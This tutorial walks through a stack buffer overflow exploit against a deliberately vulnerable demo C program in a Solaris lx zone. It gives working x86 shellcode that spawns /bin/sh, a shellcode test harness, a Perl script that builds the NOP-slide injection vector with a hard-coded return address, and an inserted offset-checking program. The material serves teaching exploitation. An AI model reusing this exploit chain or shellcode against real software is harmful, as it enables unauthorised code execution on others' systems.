First, an example program with a buffer overflow vulnerability is shown. Then a shellcode is developed that takes the peculiarities of the user-level system call handling in an lx zone on Solaris into account. This is achieved by slipping lx_brandz.so.1 a virtual stack, so that the shellcode is not modified during the call to exec(). Finally, a program and a script are developed which together produce a complete injection vector.

To keep the example simple, a plain stack-based overflow is used. The program under attack is shown below:

#include <stdio.h>
#include <string.h>     /* strerror() */
#include <errno.h>
#include <sys/mman.h>

#define UNPROTECT_STACK
/* #define PRINT_ESP */ /* define this to print %esp via TRACE_ESP (see below) */
#define STACK_BEGIN 0x08046000
#define STACK_SIZE 8192
#define STACK_PERMISSIONS (PROT_READ | PROT_WRITE | PROT_EXEC)

The function __get_esp() is used through the macro TRACE_ESP to print the address of the stack. Normally this feature is not available in a program under attack, so it can be switched off here as well (leave PRINT_ESP undefined). In that case the value of the %esp register can simply be determined with a debugger.

/* leaves %esp in %eax, which is where gcc (x86, 32 bit, no optimisation)
 * expects the return value; not portable, but sufficient for this demo */
unsigned long __get_esp() {
    __asm__("movl %esp,%eax");
}
#ifdef PRINT_ESP
#define TRACE_ESP(functionname) \
    (printf("%s at %%esp: 0x%08lx\n", (functionname), __get_esp()))
#else
#define TRACE_ESP(functionname)
#endif

For demonstration purposes, the function __gets() was written; it behaves roughly like gets(). The qualitative difference is that the function's behaviour when reading binary data can be controlled better.

/* dangerous: __gets is evil!!! never call this function!!! */
/* copies stdin up to the first newline into ptr without any bounds check */
void __gets(char* ptr) {
    char c;
    while (fread(&c, sizeof(c), 1, stdin)) {
        if (c == '\n')
            break;
        else
            *ptr++ = c;
    }
    *ptr = '\0';
}

The attack itself targets the function do_work(). It exploits the fact that __gets() writes into the buffer name without checking whether there is enough room in the buffer.

void do_work() {
    char name[512];              /* 512 bytes on the stack, overrun by __gets() */
    TRACE_ESP("do_work");
    printf("What's your name? ");
    __gets(name);
    printf("hello, %s\n", name);
}

What is interesting in the main program is the manipulation of the stack's access permissions before the call to do_work(). Here the interested reader can test how the program behaves with restricted permissions (in particular without PROT_EXEC).

int main(void) {
#ifdef UNPROTECT_STACK
    if (0 != mprotect((void*)STACK_BEGIN,
                      STACK_SIZE, STACK_PERMISSIONS)) {
        fprintf(stderr, "mprotect: %s\n", strerror(errno));
        return -1;
    }
#endif
    TRACE_ESP("main");
    do_work();
    return 1;
}

The culprit

The shellcode works in several steps:

  • Jump to the end of the shellcode (call_position) and back to the beginning. As a result, the address of the first byte after the call is on the stack. It is then stored in %esi.
  • Set up a new stack frame below the shellcode. The problem is that in the test environment (Solaris Brandz with Linux) a call to int $0x80 is forwarded to a userspace library (lx_brandz.so.1). Those function calls naturally take up space on our stack and would overwrite the string "/bin/sh" and the two pointers argv and env. Creating the new stack frame protects the data from being overwritten.
  • Close stdin and reopen it. In the demonstration the program reads the injection vector (IV) via a pipe or input redirection. After the IV has been read completely and /bin/sh has been started, read() has no more data to read, which the shell interprets as EOF, and it exits. So we close the pipe and open /dev/tty as file descriptor 0, which corresponds to stdin.
  • Execute /bin/sh. A detailed explanation of this fragment can be found in Aleph One: Smashing The Stack For Fun And Profit. Phrack, Volume Seven, Issue Forty-Nine.

char shellcode[] = 
"\xeb\x43" /* jmp 0x804840d <call_position> */
"\x5e" /* pop %esi */
/* create artificial stack begin */
"\x89\xf4" /* mov %esi, %esp */
"\x89\xf5" /* mov %esi, %ebp */
"\x83\xed\x40" /* sub $0x40, %ebp */
"\x83\xec\x60" /* sub $0x60, %esp */
/* close stdin and reopen it */
"\x56" /* push %esi */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x06" /* mov $0x6,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x5e" /* pop %esi */
"\x56" /* push %esi */
"\x31\xc0" /* xor %eax,%eax */
"\x88\x46\x0f" /* mov %al,0x0f(%esi) */
"\xb0\x05" /* mov $0x5,%al */
"\x8d\x5e\x07" /* lea 0x7(%esi),%ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xcd\x80" /* int $0x80 */
"\x5e" /* pop %esi */
/* exec /bin/sh (I copied the whole thing from shellcode.org) */
"\x89\x76\x08" /* mov %esi,0x8(%esi) */
"\x31\xc0" /* xor %eax,%eax */
"\x88\x46\x07" /* mov %al,0x7(%esi) */
"\x89\x46\x0c" /* mov %eax,0xc(%esi) */
"\xb0\x0b" /* mov $0xb,%al */
"\x89\xf3" /* mov %esi,%ebx */
"\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* lea 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xb8\xff\xff\xff" /* call start_of_exploit */
"/bin/sh"
"/dev/tty";
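Before such a shellcode is used, it is worth checking its offsets mechanically rather than by hand. The following C program is an added check that is not part of the original article: it contains the shellcode bytes from above verbatim and verifies that the leading jmp lands on the call, that the call lands on the pop %esi, that "/bin/sh" and "/dev/tty" sit at %esi+0 and %esi+7 (the offsets that the two mov %al,... instructions NUL-terminate), and that no 0x00 byte occurs before the strings, since shellcode.c prints the buffer with printf("%s") and would truncate it at the first NUL. The function names are ours.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* the shellcode from the post, byte for byte, without the comments */
static const unsigned char sc[] =
    "\xeb\x43\x5e\x89\xf4\x89\xf5\x83\xed\x40\x83\xec\x60"
    "\x56\x31\xc0\xb0\x06\x31\xdb\xcd\x80\x5e"
    "\x56\x31\xc0\x88\x46\x0f\xb0\x05\x8d\x5e\x07\x31\xc9\xcd\x80\x5e"
    "\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xb8\xff\xff\xff"
    "/bin/sh"
    "/dev/tty";

/* Length as strlen() and printf("%s") see it: an embedded 0x00 would cut the
 * injection vector short before it ever reaches the vulnerable program. */
size_t shellcode_length(void) { return strlen((const char *)sc); }

/* Target of the leading short jmp (opcode 0xEB, rel8) as an offset into sc:
 * the address of the next instruction plus the signed displacement. */
size_t jmp_target(void) {
    return (size_t)(2 + (int8_t)sc[1]);
}

/* Target of the near call (opcode 0xE8, rel32) located at call_pos. */
size_t call_target(size_t call_pos) {
    uint32_t raw = (uint32_t)sc[call_pos + 1] | (uint32_t)sc[call_pos + 2] << 8 |
                   (uint32_t)sc[call_pos + 3] << 16 | (uint32_t)sc[call_pos + 4] << 24;
    int32_t rel = (int32_t)raw;
    return (size_t)((long)(call_pos + 5) + rel);
}

/* Offset that ends up in %esi: the return address pushed by the call, i.e. the
 * first byte after it, which must be the start of "/bin/sh". */
size_t esi_offset(void) { return jmp_target() + 5; }

/* Runs all consistency checks; returns 0 on success or the number of the failing check. */
int shellcode_selfcheck(void) {
    size_t call_pos = jmp_target();
    if (sc[call_pos] != 0xe8) return 1;                   /* jmp must land on the call */
    if (sc[call_target(call_pos)] != 0x5e) return 2;      /* call must land on pop %esi */
    size_t esi = call_pos + 5;
    if (memcmp(sc + esi, "/bin/sh", 7) != 0) return 3;    /* execve path at %esi+0, NUL written at %esi+7 */
    if (strcmp((const char *)sc + esi + 7, "/dev/tty") != 0) return 4; /* open() path at %esi+7, NUL at %esi+15 */
    if (shellcode_length() != esi + 15) return 5;         /* no stray NUL inside the code */
    return 0;
}

int main(void) {
    printf("length: %zu bytes\n", shellcode_length());
    printf("jmp -> offset %zu, call -> offset %zu, %%esi = offset %zu\n",
           jmp_target(), call_target(jmp_target()), esi_offset());
    printf("selfcheck: %d\n", shellcode_selfcheck());
    return 0;
}
```

Whenever an instruction is inserted or removed between the pop %esi and the call, both displacements (the rel8 of the jmp and the rel32 of the call) change; running this check after every edit is cheaper than finding out inside the debugger that %esi points into the middle of the code.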

shellcode.c

We use the following program to print the shellcode and to construct the injection vector. The program understands the parameters -l (print the length of the shellcode) and -x (execute the shellcode). If the program is run without parameters, the shellcode is written to stdout.

The shellcode itself should be stored in a variable named shellcode, which in turn is defined in a header file. This header file is included, unusually, in the middle of main(). The reason is that the shellcode assumes it resides on the stack. To test the shellcode, you should therefore create an environment that is as realistic as possible and store the shellcode in a local buffer.

Here too I would like to point out the option of trying out how the shellcode behaves on a stack protected with mprotect().

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int
main(int argc, char* argv[]) {
    /* include shellcode buffer here, so that it is stored on the stack */
#include "own.c"
    if (argc == 1) {
        /* printf("%s") stops at the first 0x00 byte, so the shellcode must not contain one */
        printf("%s", shellcode);
        return 0;
    }
    if (argc == 2 && 0 == strcmp(argv[1], "-l")) {
        printf("%u\n", (unsigned) strlen(shellcode));
        return 0;
    }
    if (argc == 2 && 0 == strcmp(argv[1], "-x")) {
        /* allow to execute code on the stack (same range as in the vulnerable program) */
        mprotect((void*)0x08046000, 8192, PROT_READ | PROT_WRITE | PROT_EXEC);
        void (*code)() = (void(*)())shellcode;
        code();
        return -1;   /* only reached if the shellcode returns */
    }
    fprintf(stderr, "Usage: %s [-l|-x]\n", argv[0]);
    return 1;
}

shellcode.pl

This Perl script is a wrapper around the program built from shellcode.c and constructs the complete injection vector (IV). The IV consists of the following parts:

  • many NOPs. This region is used as a NOP slide, because we do not want to deal here with how to hit the shellcode byte-exactly.

  • the shellcode

  • NOPs again. Sometimes it may be useful to shift the shellcode a bit towards lower addresses. These NOP instructions serve as padding up to the instruction pointer.

  • EBP. A 4-byte number which is the base address of the next higher stack frame. Since our shellcode sets up its own stack frame, this number can be arbitrary.

  • EIP. A 4-byte number which is the address of the first instruction of the IV to be executed. Determining the correct value of this address means spending some time with a debugger. Again I would like to refer to the very detailed articles in Phrack magazine.

The script takes as parameters the length of the buffer to be overwritten and the number of NOPs to insert after the shellcode. How to determine these numbers is not covered here either.

The total size of the IV written to stdout is the given buffer length plus the second NOP count plus 8 bytes (for EBP and EIP).

#!/usr/bin/perl -w
use strict;

if (2 != scalar @ARGV) {
    die "Usage: ./shellcode.pl <buffer_length> <nop_length2>\n";
}

my $buffer_length = $ARGV[0];
my $nop_length2 = $ARGV[1];

binmode STDOUT;

chomp (my $shellcode_length = `./shellcode -l`);
my $shellcode = `./shellcode`;
my $nop_length1 = $buffer_length - $shellcode_length;
my $eip_recurrence = 1;

die "buffer length $buffer_length is smaller than the shellcode ($shellcode_length bytes)\n"
    if $nop_length1 < 0;

print STDERR "shellcode length: $shellcode_length bytes\n";
print STDERR "buffer length: $buffer_length bytes\n";
print STDERR "nop sliding 1: $nop_length1 bytes\n";
print STDERR "nop sliding 2: $nop_length2 bytes\n";

# return address 0x08047520, little-endian; determined with the debugger
my $eip = chr(0x20) . chr(0x75) . chr(0x04) . chr(0x08);
my $ebp = $eip;

my $nop_slide1 = (chr(0x90) x $nop_length1);
my $nop_slide2 = (chr(0x90) x $nop_length2);
my $iv = $nop_slide1 . $shellcode . $nop_slide2 . $ebp . ($eip x $eip_recurrence);

print STDOUT $iv;